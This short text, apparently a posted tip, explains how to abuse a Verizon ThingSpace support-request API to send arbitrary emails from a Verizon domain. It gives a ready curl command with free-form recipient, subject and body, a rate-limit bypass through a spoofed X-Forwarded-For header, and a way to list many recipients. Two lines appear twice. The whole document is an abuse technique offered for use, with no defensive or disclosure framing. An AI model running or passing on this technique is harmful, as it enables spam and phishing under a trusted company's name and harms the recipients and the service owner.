You can send emails from Verizon domain using this technique:
Rate Limit Bypass: Change "X-Forwarded-For" header value.
Multiple Recipients: Use array in "to" param. Example: "to":["[email protected]", "[email protected]"]
Bash:
curl -X POST "https://thingspace.verizon.com/sso/ui/api/user/supportRequest" -H "Content-Type: application/json" -H "X-Forwarded-For: 127.0.0.1" -d '{"to":"[email protected]","subject":"Subject","body":"Body"}'
Rate Limit Bypass: Change "X-Forwarded-For" header value.
Multiple Recipients: Use array in "to" param. Example: "to":["[email protected]", "[email protected]"]